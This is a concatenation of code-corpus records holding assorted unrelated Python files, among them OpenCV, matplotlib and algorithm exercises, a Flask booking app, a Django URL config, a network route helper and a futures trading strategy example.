\n\nx=cv2.imread(\"house.tif\")\nimg=cv2.cvtColor(x,cv2.COLOR_BGR2GRAY)\nimg=np.float32(img)\n\ndst=cv2.cornerHarris(img,2,3,0.04)\ndst=cv2.dilate(dst,None)\nx[dst>0.01*dst.max()]=[0,0,255]\n\ncv2.imshow(\"img\",x)\n#cv2.imshow(\"corner\",dst)\n\nk=cv2.waitKey(0)\nif k==27:\n\tcv2.destroyAllWindows()","sub_path":"q19.py","file_name":"q19.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"479534762","text":"# 10\ndef test():\n n = int(input())\n exponents = input().split()\n exponents = list(map(int, exponents))\n graph = [[0] * n for _ in range(0, n)]\n for _ in range(0, n - 1):\n edge = input().split()\n edge = list(map(int, edge))\n graph[edge[0] - 1][edge[1] - 1] = 1\n graph[edge[1] - 1][edge[0] - 1] = 1\n res = fix(graph, exponents)\n print(res,end='')\n\n\ndef fix(graph, exponents):\n res = [sum(exponents)]\n dfs(graph, exponents, res)\n return max(res)\n\n\ndef dfs(graph, exponents, res):\n for i in range(0, len(graph)):\n for j in range(i, len(graph)):\n if graph[i][j] == 1:\n graph[i][j] = 0\n graph[j][i] = 0\n graphs = []\n unions = []\n getUnions(graphs, graph, unions)\n exponents0 = []\n for k in unions[0]:\n exponents0.append(exponents[k])\n exponents1 = []\n for k in unions[1]:\n exponents1.append(exponents[k])\n if sum(exponents0) > sum(exponents1):\n res.append(sum(exponents0))\n dfs(graphs[0], exponents0, res)\n elif sum(exponents0) < sum(exponents1):\n 
res.append(sum(exponents1))\n dfs(graphs[1], exponents1, res)\n else:\n res.append(sum(exponents0))\n dfs(graphs[0], exponents0, res)\n dfs(graphs[1], exponents1, res)\n graph[i][j] = 1\n graph[j][i] = 1\n\n\ndef getUnions(graphs, graph, unions):\n for i in range(0, len(graph)):\n union = [i]\n for j in range(0, len(graph)):\n if graph[i][j] == 1:\n union.append(j)\n if not unions:\n unions.append(union)\n else:\n ok = False\n for k in range(0, len(unions)):\n if list(set(union).intersection(set(unions[k]))):\n unions.append(list(set(union).union(set(unions.pop(k)))))\n ok = True\n break\n if not ok:\n unions.append(union)\n getFinalUnions(unions)\n for union in unions:\n g = [[0] * len(union) for _ in range(0, len(union))]\n ind = 0\n for i in union:\n oud = 0\n for j in union:\n if graph[i][j] == 1:\n g[ind][oud] = graph[i][j]\n oud = oud + 1\n ind = ind + 1\n graphs.append(g)\n","sub_path":"Code/CodeRecords/2455/60698/306813.py","file_name":"306813.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"272329613","text":"from pylab import *\n\npart = '2.1'\n\ntest_acc1 = loadtxt('../training_data/test_accuracy_part'+part+'.txt')\ntrain_acc1 = loadtxt('../training_data/train_accuracy_part'+part+'.txt')\ntest_loss1 = loadtxt('../training_data/test_loss_part'+part+'.txt')\ntrain_loss1 = loadtxt('../training_data/train_loss_part'+part+'.txt')\n\npart = '2.2'\n\ntest_acc2 = loadtxt('../training_data/test_accuracy_part'+part+'.txt')\ntrain_acc2 = loadtxt('../training_data/train_accuracy_part'+part+'.txt')\ntest_loss2 = loadtxt('../training_data/test_loss_part'+part+'.txt')\ntrain_loss2 = loadtxt('../training_data/train_loss_part'+part+'.txt')\n\nsvm_acc = loadtxt('../training_data/test_accuracy_svm.txt')\n\nrcParams['font.family'] = 'serif'\nrcParams['font.sans-serif'] = ['times']\nrcParams['font.size'] = 7\nf = figure(figsize=(5.55, 2.3))\nf.patch.set_facecolor('white')\n\nsubplot(131)\nloglog(train_loss1, 'r', linestyle='dotted')\nloglog(train_loss2, 'b', linestyle='dotted')\nl1, = loglog(test_loss1, 'r')\nl2, = loglog(test_loss2, 'b')\ngca().spines['right'].set_visible(False)\ngca().spines['top'].set_visible(False)\ngca().yaxis.set_ticks_position('left')\ngca().xaxis.set_ticks_position('bottom')\nxlim(1,200)\nxlabel('Epoch (minibatch 200)')\nylabel('Loss')\nlegend([l1, l2], ['softmax', 'CNN'],\n loc=3, frameon=False, fontsize='7')\ngca().annotate('(a)', xy=(0.017, 0.95),\n xycoords='figure fraction', fontsize='8')\n\nsubplot(132)\nsemilogx(train_acc1, 'r', linestyle='dotted')\nsemilogx(train_acc2, 'b', linestyle='dotted')\nl1, = semilogx(test_acc1, 'r')\nl2, = semilogx(test_acc2, 'b')\ngca().spines['right'].set_visible(False)\ngca().spines['top'].set_visible(False)\ngca().yaxis.set_ticks_position('left')\ngca().xaxis.set_ticks_position('bottom')\nxlim(1,200)\nxlabel('Epoch (minibatch 200)')\nylabel('Accuracy')\nlegend([l1, l2], ['softmax', 'CNN'],\n loc=4, frameon=False, fontsize='7')\ngca().annotate('(b)', xy=(0.35, 0.95),\n xycoords='figure fraction', fontsize='8')\n\nsubplot(133)\nsemilogx(svm_acc)\nsemilogx([1, 40], [1.0, 1.0], 'b', linestyle='dotted')\nylim(0.1,1)\nxlim(1,200)\ngca().spines['right'].set_visible(False)\ngca().spines['top'].set_visible(False)\ngca().yaxis.set_ticks_position('left')\ngca().xaxis.set_ticks_position('bottom')\nxlabel('Train set size (200)')\nylabel('Accuracy')\ngca().annotate('(c)', xy=(0.676, 0.95),\n xycoords='figure fraction', 
fontsize='8')\n\ntight_layout()\nsavefig('Fig2.pdf')","sub_path":"figures/plot_Fig2.py","file_name":"plot_Fig2.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
{"seq_id":"459012297","text":"from visualTree import *\nfrom myNode import *\n\nprintTree_level(deserialize('{2,1,3,0,7,9,1,2,#,1,0,#,#,8,8,#,#,#,#,7}'))\n\ndef recoverTree(root):\n    change = []\n    minval = -(1<<31)\n    maxval = (1<<31)-1\n    BST(root, minval, maxval, change)\n    if change:\n        if len(change) == 2:\n            # swap the values of the two misplaced nodes\n            change[0][1].val, change[1][1].val = change[1][1].val, change[0][1].val\n        elif len(change) == 1:\n            # adjacent swap: exchange the parent and child values\n            change[0][0].val, change[0][1].val = change[0][1].val, change[0][0].val\n\ndef BST(root, minval, maxval, change):\n    if not root:\n        return\n    if root.left:\n        if root.left.val > root.val:\n            change.append([root, root.left])  # record the violating parent/child pair\n        BST(root.left, minval, root.val-1, change)\n    if root.right:\n        if root.val > root.right.val:\n            change.append([root, root.right])  # record the violating parent/child pair\n        BST(root.right, root.val+1, maxval, change)\n\ndef recoverTree1(root):\n    pass  # alternative approach, not implemented\n\n","sub_path":"RecoverBinarySearchTree.py","file_name":"RecoverBinarySearchTree.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
{"seq_id":"511838772","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.5 (3351)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /usr/local/lib/python3.5/dist-packages/netana/bldmat.py\n# Compiled at: 2014-06-13 19:28:46\n# Size of source mod 2**32: 902 bytes\n\n\ndef bldmat(nbrow=2, nbcol=2, obj='0'):\n    \"\"\"Build matrix of obj's nbrows by nbcols.\n    Call: bldmat(nbrow=2,nbcol=2,obj='0')\n    Returns: Matrix (list of lists) of obj.\"\"\"\n    res = []\n    for row in range(nbrow):\n        temp = []\n        for col in range(nbcol):\n            temp.append(obj)\n\n        if nbrow == 1:\n            return temp\n        res.append(temp)\n\n    return res\n\n\nif __name__ == '__main__':\n    mat = bldmat(10, 10)\n    print('10X10 \"0\" matrix')\n    print('{}'.format(mat))\n    mat = bldmat(1, 10)\n    print('1X10 \"0\" matrix')\n    print('{}'.format(mat))\n    mat = bldmat(3, 3, 'A')\n    print('3X3 \"A\" matrix')\n    print('{}'.format(mat))\n    mat[0][0] = 'B'\n    print('{}'.format(mat))","sub_path":"pycfiles/netana-3.1.18.linux-x86_64.tar/bldmat.cpython-35.py","file_name":"bldmat.cpython-35.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
{"seq_id":"538959538","text":"from flask import Flask,render_template,request,session,redirect,url_for\nfrom application import app,db\nfrom application.models.randevu_model import Randevu\nfrom application.models.kullanici_model import Kullanici\nfrom datetime import datetime\nfrom flask_mail import Mail, Message\n\n\napp.config['MAIL_SERVER']='smtp.gmail.com'\napp.config['MAIL_PORT'] = 465\napp.config['MAIL_USERNAME'] = 'furkanece99@gmail.com'\napp.config['MAIL_PASSWORD'] = ''\napp.config['MAIL_USE_TLS'] = False\napp.config['MAIL_USE_SSL'] = True\n\nmail = Mail(app)\n\n\n@app.route(\"/randevu\", methods=['GET'])\ndef randevu():\n    formatted_randevular = {}\n    for key in range(0, 24):\n        if key < 10:\n            formatted_randevular['0{}:00'.format(key)] = 0\n        else:\n            formatted_randevular['{}:00'.format(key)] = 0\n    today_date = datetime.now()\n    change_date = today_date.strftime(\"%Y-%m-%d\")\n    randevular = Randevu.query.filter_by(tarih = change_date, saha=1).all()\n    for randevu in randevular:\n        formatted_randevular[randevu.saat] = randevu.aktif_randevu\n    return render_template(\"randevu.html\", 
randevu = formatted_randevular, tarih = change_date, saha=\"1\")\n\n@app.route(\"/randevu/<saha>/<tarih>\", methods=['GET'])\ndef randevuye_git(saha, tarih):\n today_date = datetime.now()\n change_date = today_date.strftime(\"%Y-%m-%d\")\n if tarih < change_date:\n tarih = change_date\n formatted_randevular = {}\n for key in range(0, 24):\n if key < 10:\n formatted_randevular['0{}:00'.format(key)] = 0\n else:\n formatted_randevular['{}:00'.format(key)] = 0\n randevular = Randevu.query.filter_by(tarih = tarih, saha=int(saha)).all()\n for randevu in randevular:\n formatted_randevular[randevu.saat] = randevu.aktif_randevu\n return render_template(\"randevu.html\", randevu = formatted_randevular, tarih = tarih, saha=saha)\n\n\n@app.route('/randevu/kaydet', methods=['POST'])\ndef kaydet():\n user_id = session[\"user_id\"]\n tarih = request.form['tarih']\n saat = request.form['saat']\n saha = request.form['saha']\n email = session[\"email\"]\n gonder = Kullanici.query.filter_by(email = email).first()\n print(gonder)\n randevu = Randevu(saat = saat, tarih=tarih, kullanici_id = user_id, saha = int(saha))\n print(randevu)\n db.session.add(randevu)\n db.session.commit()\n msg = Message('Randevunuz Oluşturulmuştur', sender = 'furkanece99@gmail.com', recipients = [gonder.email])\n msg.body = \"Saat \"+ randevu.saat +\"'ya \"+ str(randevu.saha) +\" numaralı saha için randevunuz oluşturulmuştur iyi eğlenceler.\"\n mail.send(msg)\n print(msg)\n return redirect(url_for(\"profile\"))\n \n \n\n\n@app.route('/randevu/sil/<id>')\ndef sil(id):\n email = session[\"email\"]\n gonder = Kullanici.query.filter_by(email = email).first()\n randevu = Randevu.query.get(id)\n db.session.delete(randevu)\n db.session.commit()\n msg = Message('Randevunuz İptal Edilmiştir', sender = 'furkanece99@gmail.com', recipients = [gonder.email])\n msg.body = \"Saat \"+ randevu.saat +\"'ya \"+ str(randevu.saha) +\" numaralı saha için alınan randevunuz iptal edilmiştir.\"\n mail.send(msg)\n print(msg)\n return redirect(url_for(\"profile\")) \n\n \n\n\n ","sub_path":"application/randevu.py","file_name":"randevu.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"27105916","text":"# -*- encoding: utf-8\n\nimport pytest\n\nfeedvalidator = pytest.importorskip('feedvalidator')\n\nfrom feedvalidator import compatibility\nfrom feedvalidator.formatter.text_plain import Formatter\n\n\ndef test_feed_is_valid_atom(hostname):\n atom_url = 'http://%s/feeds/all.atom.xml' % hostname\n try:\n events = feedvalidator.validateURL(\n atom_url, firstOccurrenceOnly=1\n )['loggedEvents']\n except feedvalidator.logging.ValidationFailure as vf:\n events = [vf.event]\n\n events = compatibility.AA(events)\n output = Formatter(events)\n print('\\n'.join(output))\n assert len(events) == 0\n","sub_path":"tests/test_atom_feed.py","file_name":"test_atom_feed.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"169655321","text":"from internetInfo import get_ivi_address\nfrom netaddr.ip import IPNetwork\nimport subprocess\nimport urllib\nimport urllib2\n\n\ndef set_second_ivi_route(target_address, target_via, iface_name):\n # first find out if the target is within the next hop\n target_via_prefix = str(IPNetwork(target_via + '/64').network)\n my_next_hop_addr = get_ivi_address(iface_name)\n my_next_prefix = str(IPNetwork(my_next_hop_addr).network)\n\n # get target_via addr's gateway\n 
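# note: the next line only recomputes the /64 prefix; the hop actually used is parsed from 'ip -6 route' below\n 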
target_via_gateway = str(IPNetwork(target_via + '/64').network)\n router_address = subprocess.Popen('sudo ip -6 route | grep ' + target_via_prefix, shell=True,\n stdout=subprocess.PIPE)\n router_address = router_address.communicate()[0].split(' ')[2]\n\n # add the needed route table on this machine\n subprocess.Popen('sudo ip -6 route del ' + target_address, shell=True)\n subprocess.Popen('sudo ip -6 route add ' + target_address + ' via ' + router_address + ' dev ' + iface_name, shell=True)\n\n if my_next_prefix != target_via_prefix:\n # we need to tell the next hop machine what to do!\n return tell_next_machine(70, target_address, target_via)\n else:\n return 'success'\n\n\ndef tell_next_machine(port_num, target_address, target_via):\n try:\n target_via_prefix = str(IPNetwork(target_via + '/64').network)\n router_address = subprocess.Popen('sudo ip -6 route | grep ' + target_via_prefix, shell=True,\n stdout=subprocess.PIPE)\n router_address = router_address.communicate()[0].split(' ')[2]\n # send the url request (http post request)\n data = {'target_address': target_address}\n data['target_via'] = target_via\n data_urlencode = urllib.urlencode(data)\n\n requrl = 'http://[' + router_address + ']:' + str(port_num) + '/update_route/'\n req = urllib2.Request(url=requrl, data=data_urlencode)\n res_data = urllib2.urlopen(req)\n return res_data.read()\n except:\n return 'Error loading data' + requrl\n finally:\n print('this Heart beat stopped')\n","sub_path":"priClient/priClient/utils/change_route_table.py","file_name":"change_route_table.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"231017180","text":"#!/usr/bin/env python\n#coding: utf8\n#Author: Felix\n#E-mail: chengfeng56@qq.com\n#Function: 购物车优化版\n\nproduct_list =[\n ['Mi 5s',1999],\n ['HaWei Mate8',2799],\n ['IPhone 6s plus',6888],\n ['ThinkPad T460P',7888],\n ['MacBook Air 13',6988],\n ['MacBook Pro 13',9288],\n]\n\nshopping_list = [] # 定义空列表\nsalary = input(\"Input your salary:\") # 输入工资\nif salary.isdigit(): # 判断是不是数字\n salary = int(salary) # 是数字转换成 int\n while True: # 进入循环\n for index,item in enumerate(product_list): # 建立商品索引给列表加下标\n print(index,item) # 打印索引及商品列表\n #break\n '''方法2 enumerate 取列表下标\n for item in shopping_list:\n print(shopping_list.index(item),item)\n break\n '''\n user_choice = input(\"选择要购买的商品:\") # 选择购买商品\n if user_choice.isdigit(): # 判断用户输入数字类型\n user_choice = int(user_choice) # 转换成int类型\n if user_choice < len(product_list) and user_choice >=0: # 判断用户输入是否在范围内\n p_itme =product_list[user_choice] # 通过下标,添加购买商品列表\n if p_itme[1] <= salary: # 判断工资是否够用\n shopping_list.append(p_itme) # 添加到已购买商品列表\n salary -= p_itme[1] # 扣除费用\n print(\"Added %s into shopping cart,your current balance is \\033[31;1m%s\\033[0m\" %(p_itme,salary)) # 显示已购买的商品和费用\n else:\n print(\"\\033[41;1m你的余额只剩[%s]了,买不起了。\\033[0m\" % salary) # 显示余额\n else:\n print(\"product code [%s] is not exist!\" % user_choice) # 提示商品不存在\n elif user_choice == 'q': # 输入 q 退出\n print('----------shopping list----------') # 打印购买商品\n for p in shopping_list:\n print(p) # 打印商品\n print(\"Your current balance:\",salary) # 显示余额\n exit()\n else:\n print(\"invalid option\")","sub_path":"01.python3-base/day2/04.购物车优化版.py","file_name":"04.购物车优化版.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"150854966","text":"import numpy as np\n\nimport measurements.util.data\nimport 
measurements.constants\n\nimport util.logging\nlogger = util.logging.logger\n\n\ndef same_box_sample_correlations(all_values, lsm):\n ## calculate all and seasonal variances\n all_values.categorize_indices_to_lsm(lsm, discard_year=False)\n seasonal_values = all_values.means(min_values=measurements.constants.MEAN_MIN_MEASUREMENTS, return_type='measurements')\n seasonal_values.discard_year()\n seasonal_variances = seasonal_values.variances(min_values=measurements.constants.DEVIATION_MIN_MEASUREMENTS, return_type='measurements')\n all_values.discard_year()\n all_variances = all_values.variances(min_values=measurements.constants.DEVIATION_MIN_MEASUREMENTS, return_type='measurements')\n \n ## calculate same box correlations\n same_box_correlations = measurements.util.data.Measurements()\n for key in seasonal_variances.keys():\n seasonal_list = seasonal_variances[key]\n assert len(seasonal_list) == 1\n seasonal_variance = seasonal_list[0]\n all_list = all_variances[key]\n assert len(all_list) == 1\n all_variance = all_list[0]\n if all_variance > 0:\n correlation = seasonal_variance / all_variance\n correlation = min(correlation, measurements.constants.CORRELATION_MAX_ABS_VALUE)\n same_box_correlations.append_value(key, correlation)\n \n return same_box_correlations\n","sub_path":"measurements/util/correlation.py","file_name":"correlation.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"246973497","text":"\nfrom django.urls import path\n\n#\n#\nfrom apps.core.views import register, reg\n\nfrom apps.articles.views import add_article_page, admin_dashboard, delArtsAdmin, delete_cat, edit_article_admin, edit_article_page, deleteArticle\n\n#admin url imports\nfrom apps.articles.views import admin_dashboard, manage_articles, add_articles_admin, deleteArticleAdmin,manage_categories, add_cat, delete_cat, edit_cat, delArtsAdmin, edit_admin_prof\n\n#accounts\nfrom apps.articles.views import manage_account\n\n\nfrom .views import myaccount,edit_profile, accept_invitation\nurlpatterns = [\n path('', accept_invitation, name='accept_invitation'),\n path('edit_profile/', edit_profile, name='edit_profile'),\n path('reg/', reg, name='reg'),\n path('register/', register, name='register'),\n path('myaccount/', myaccount, name='myaccount'),\n \n \n #User article paths\n path('add_article/', add_article_page, name='add_article'),\n path('edit_article//', edit_article_page, name='edit_art'),\n path('delete_article//', deleteArticle, name='del_art'),\n \n #ADMIN URLS\n path('admin_dashboard/',admin_dashboard, name='admin_dashboard'), #for dashboard\n \n path('manage_articles/',manage_articles, name='manage_articles'), #to manage articles\n path('add_articles_admin/',add_articles_admin, name='add_articles_admin'), #add an article\n path('edit_article_admin//', edit_article_admin, name='edit_art_admin'), #edit an article\n path('edit_article_admin//', edit_article_admin, name='edit_art_admin'), #edit an article\n path('delete_article_admin//', deleteArticleAdmin, name='del_art_admin'), #delete an article\n path('delete_articles_admin/',delArtsAdmin, name='del_arts'), #add an article\n \n \n path('manage_categories/',manage_categories, name='manage_categories'), #manage categories\n path('add_category/', add_cat, name='add_cat'),\n path('add_category//', add_cat, name='add_cat'),\n path('edit_category/', edit_cat, name='edit_cat'), #\n path('delete_category//', delete_cat, name='del_cat'), #\n path('manage_account/', 
manage_account, name='manage_account'), #\n path('edit_prof/', edit_admin_prof, name='edit_prof'), #\n \n \n]\n","sub_path":"apps/userprofile/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"6059231","text":"from database import *\nimport hashlib\nimport requests\nimport time\n\nloop_time = 60\n\ndef make_url(account):\n userid = hashlib.md5(account.url.encode('utf-8')).hexdigest()\n return 'http://%s/secrets/%s' % (account.url, userid)\n\ndef make_flag(account):\n userid = hashlib.md5(account.url.encode('utf-8')).hexdigest()\n return \"FLAG_%s\" % userid\n\ndef has_flag(account):\n response = requests.get(make_url(account))\n return response.status_code == 200 and \\\n make_flag(account) in str(response.content)\n\ndef put_flag(account):\n url = make_url(account)\n flag = make_flag(account)\n response = requests.post(url, data={'note': flag})\n response.raise_for_status()\n print('uploaded flag: %s for url: %s' % (flag, url))\n\n\n\nif __name__ == '__main__':\n while True:\n\n start_time = time.time()\n\n try:\n for account in Account.select():\n print(account.url, \" \", end=\"\")\n\n try:\n is_up = has_flag(account)\n\n if not is_up:\n put_flag(account)\n is_up = has_flag(account)\n\n except:\n is_up = False\n\n account.is_up = is_up\n\n if is_up:\n account.points += 10\n\n account.save()\n print(\"UP\" if is_up else \"DOWN\")\n\n\n elapsed = time.time() - start_time\n time.sleep(loop_time - elapsed)\n\n except KeyboardInterrupt:\n break\n","sub_path":"chart/verifier.py","file_name":"verifier.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"123417323","text":"# -*- coding: utf-8 -*-\n# AlgoPlus量化投资开源框架范例\n# 微信公众号:AlgoPlus\n# 项目地址:http://gitee.com/AlgoPlus/AlgoPlus\n# 项目网址:http://www.algo.plus\n# 项目网址:http://www.ctp.plus\n# 项目网址:http://www.7jia.com\n\n\nfrom time import sleep\nfrom multiprocessing import Process, Queue\nfrom profit_loss_manager_base import ProfitLossManagerBase\nfrom tick_engine import TickEngine\n\n\nclass MyProfitLossManager(ProfitLossManagerBase):\n def __init__(self, td_server, broker_id, investor_id, password, app_id, auth_code, md_queue=None\n , page_dir='', private_resume_type=2, public_resume_type=2):\n\n super(MyProfitLossManager, self).__init__(td_server, broker_id, investor_id, password, app_id, auth_code, md_queue\n , page_dir, private_resume_type, public_resume_type)\n\n self.trading_schedule = []\n self.anchor_time_list = []\n self.server_time_dict = {}\n\n # 初始化参数\n self.init_parameter()\n\n # 等待子线程结束\n self.Join()\n\n # ############################################################################# #\n def init_parameter(self):\n \"\"\"\n 初始化策略参数\n :return:\n \"\"\"\n parameter_dict = self.md_queue.get(block=False) # 策略参数结构体\n self.pl_parameter_dict = parameter_dict[b\"ProfitLossParameterDict\"]\n self.order_ref = parameter_dict[b\"ID\"] * 10000\n self.order_ref_range = [self.order_ref, self.order_ref + 10000]\n self.trading_schedule = parameter_dict[b\"TradingScheduleDict\"]\n\n self.anchor_time_list = parameter_dict[b\"AnchorTimeList\"]\n for instrument_id in self.trading_schedule.keys():\n if instrument_id not in self.instrument_id_registered:\n self.instrument_id_registered.append(instrument_id)\n\n self._write_log(f\"策略参数初始化完成!ID=>{parameter_dict[b'ID']}\")\n\n def is_my_order(self, order_ref):\n \"\"\"\n 以OrderRef标识本策略订单。\n \"\"\"\n return order_ref.isdigit() and self.order_ref_range[0] < int(order_ref) < self.order_ref_range[1]\n\n def update_time_trigger(self, server_time, instrument_id):\n \"\"\"\n 如果触发时间条件则发出开仓委托。\n :param server_time: 服务器时间列表。server_time[0]表示最新时间,server_time[1]表示前一刻的时间\n :param instrument_id: 合约\n :return:\n \"\"\"\n for anchor_time in self.anchor_time_list:\n if server_time[1] < anchor_time <= server_time[0]:\n self.order_ref += 1\n exchange_id = self.trading_schedule[instrument_id][b\"ExchangeID\"]\n volume = self.trading_schedule[instrument_id][b\"Volume\"]\n direction = self.trading_schedule[instrument_id][b\"Direction\"]\n order_price = self.get_default_price(instrument_id, direction)\n self.req_order_insert(exchange_id, instrument_id, order_price, volume, self.order_ref, direction, b\"0\")\n self._write_log(f\"服务器时间{server_time[0]}触发{anchor_time}{'买' if direction == b'0' else '卖'}开仓{instrument_id},价格:{order_price},手数:{volume}\")\n\n # ############################################################################# #\n def Join(self):\n while True:\n if self.status == 0:\n self.process_rtn_trade()\n\n while not self.md_queue.empty():\n last_md = self.md_queue.get(block=False)\n instrument_id = last_md[\"InstrumentID\"]\n if instrument_id in self.instrument_id_registered:\n if instrument_id not in self.server_time_dict.keys():\n self.server_time_dict[instrument_id] = [b\"00:00:00\", b\"00:00:00\"]\n update_time = last_md[\"UpdateTime\"]\n self.server_time_dict[instrument_id][0] = update_time\n self.md_dict[instrument_id] = last_md\n if self.server_time_dict[instrument_id][1] != b\"00:00:00\":\n self.update_time_trigger(self.server_time_dict[instrument_id], instrument_id)\n self.server_time_dict[instrument_id][1] = update_time\n\n self.check_position()\n else:\n sleep(1)\n\n\nif __name__ == \"__main__\":\n from account_info import my_future_account_info_dict\n\n future_account = my_future_account_info_dict['SimNow']\n\n # 共享队列\n share_queue = Queue(maxsize=100)\n pl_parameter = {b\"ID\": 9,\n # 开仓时间点\n b\"AnchorTimeList\": [b\"01:05:00\", b\"01:05:30\", b\"01:06:00\", b\"01:06:30\", b\"01:07:00\", b\"01:07:30\", b\"01:08:00\", b\"01:08:30\"],\n # 计划交易的合约及参数\n b\"TradingScheduleDict\": {b\"rb2001\": {b\"ExchangeID\": b\"SHFE\", b\"Direction\": 1, b\"Volume\": 1},\n b\"ag1912\": {b\"ExchangeID\": b\"SHFE\", b\"Direction\": 1, b\"Volume\": 1},\n },\n # 止损参数\n b\"ProfitLossParameterDict\": {b\"rb2001\": {b\"0\": [2], b\"1\": [2]},\n b\"ag1912\": {b\"0\": [10], b\"1\": [10]},\n }\n }\n share_queue.put(pl_parameter)\n\n # 行情进程\n md_process = Process(target=TickEngine, args=(future_account.server_dict['MDServer']\n , future_account.broker_id\n , future_account.investor_id\n , future_account.password\n , future_account.app_id\n , future_account.auth_code\n , future_account.instrument_id_list\n , [share_queue]\n , future_account.md_page_dir)\n )\n\n # 交易进程\n trader_process = Process(target=MyProfitLossManager, args=(future_account.server_dict['TDServer']\n , future_account.broker_id\n , future_account.investor_id\n , future_account.password\n , future_account.app_id\n , future_account.auth_code\n , share_queue\n , future_account.td_page_dir)\n )\n\n md_process.start()\n trader_process.start()\n\n md_process.join()\n trader_process.join()\n","sub_path":"AdvancedCookbook/timing_trading/timing_trading_example.py","file_name":"timing_trading_example.py","file_ext":"py","file_size_in_byte":7134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"219963034","text":"# This file acts as a constant for hyperparameter tuning and other config\n\nimport os\n\n# If using GPU, you can set num_workers > 0\n# Otherwise (using CPU), set the num_workers = 0\ntrain_param = {\n 'batch_size': 8,\n 'shuffle': True,\n 'num_workers': 2\n}\n\ndev_param = {\n 'batch_size': 8,\n 'shuffle': True,\n 'num_workers': 2\n}\n\nMAX_LEN = 150 # The length of additional padding for BERT\nEPOCHS = 5\nLEARNING_RATE = 3e-05\nTRAIN_DEV_SPLIT = 0.8\nGPU = 0 # Deciding which gpu to be used. 0 is the default value\nDEVICE = 'cuda'\nBIOBERT_CONFIG = 'biobert_v1.1_pubmed/config.json'\nBIOBERT_MODEL = 'biobert_v1.1_pubmed/pytorch_model.bin'\nBIOBERT_VOCAB = 'biobert_v1.1_pubmed/vocab.txt'\nSAVED_MODEL_DIR = 'models/ner/saved_model'\nCHECK_FOLDER = os.path.isdir(SAVED_MODEL_DIR)\nTRAIN_DATA_DIR = 'data/ner/train.tsv'\nTEST_DATA_DIR = 'data/ner/test.tsv'\n\nimport json\n\ndef save_hp_to_json(traintime):\n \"\"\"\n A function to save hyperparameter data to json file\n\n args:\n datetime -- datetime object to generate hyperparameter json file\n e.g. 'hyperparam_20211013_075856'\n\n \"\"\"\n hp_data = {}\n hp_data['train_param'] = train_param\n hp_data['dev_param'] = dev_param\n hp_data['max_len'] = MAX_LEN\n hp_data['epochs'] = EPOCHS\n hp_data['learning_rate'] = LEARNING_RATE\n hp_data['train_dev_split'] = TRAIN_DEV_SPLIT\n hp_data['gpu'] = GPU\n savedate = traintime.strftime(\"%Y%m%d\")\n savetime = traintime.strftime(\"%H%M%S\")\n\n if not CHECK_FOLDER:\n os.makedirs(SAVED_MODEL_DIR)\n with open(f'models/ner/saved_model/hyperparam_{savedate}_{savetime}.json', 'w') as outfile:\n json.dump(hp_data, outfile)\n","sub_path":"models/ner/hyperparameter.py","file_name":"hyperparameter.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"152296156","text":"import logging\nimport simplejson as json\ntry:\n import subprocess32 as subprocess\nexcept ImportError:\n import subprocess\nimport sys\nimport time\nfrom collections import OrderedDict\nfrom invisibleroads.scripts import (\n Script, StoicArgumentParser, configure_subparsers, get_scripts_by_name,\n run_scripts)\nfrom invisibleroads_macros.configuration import (\n split_arguments, SECTION_TEMPLATE)\nfrom invisibleroads_macros.disk import (\n cd, copy_text, link_path, make_folder, COMMAND_LINE_HOME, HOME_FOLDER)\nfrom invisibleroads_macros.iterable import merge_dictionaries\nfrom invisibleroads_macros.text import unicode_safely\nfrom os.path import abspath, basename, exists, isabs, join\nfrom stevedore.extension import ExtensionManager\n\nfrom ..configurations import (\n ResultConfiguration, load_result_arguments, load_tool_definition,\n parse_data_dictionary, render_command)\nfrom ..exceptions import CrossComputeError, DataParseError\nfrom ..extensions import DefaultTool\nfrom ..symmetries import SCRIPT_ENVIRONMENT\nfrom ..types import initialize_data_types\n\n\nclass ToolScript(Script):\n\n def configure(self, argument_subparser):\n argument_subparser.add_argument(\n 'tool_name', nargs='?', type=unicode_safely, default='')\n argument_subparser.add_argument(\n '--data_folder', metavar='FOLDER', type=unicode_safely)\n argument_subparser.add_argument(\n '--suffix_by_data_type', metavar='JSON', type=json.loads)\n argument_subparser.add_argument('--debug', action='store_true')\n\n def run(self, args):\n initialize_data_types(args.suffix_by_data_type)\n tool_definition = prepare_tool_definition(args.tool_name, args.debug)\n 
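# when --data_folder is absent, fall back to HOME_FOLDER/.crosscompute/<tool_name>\n 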
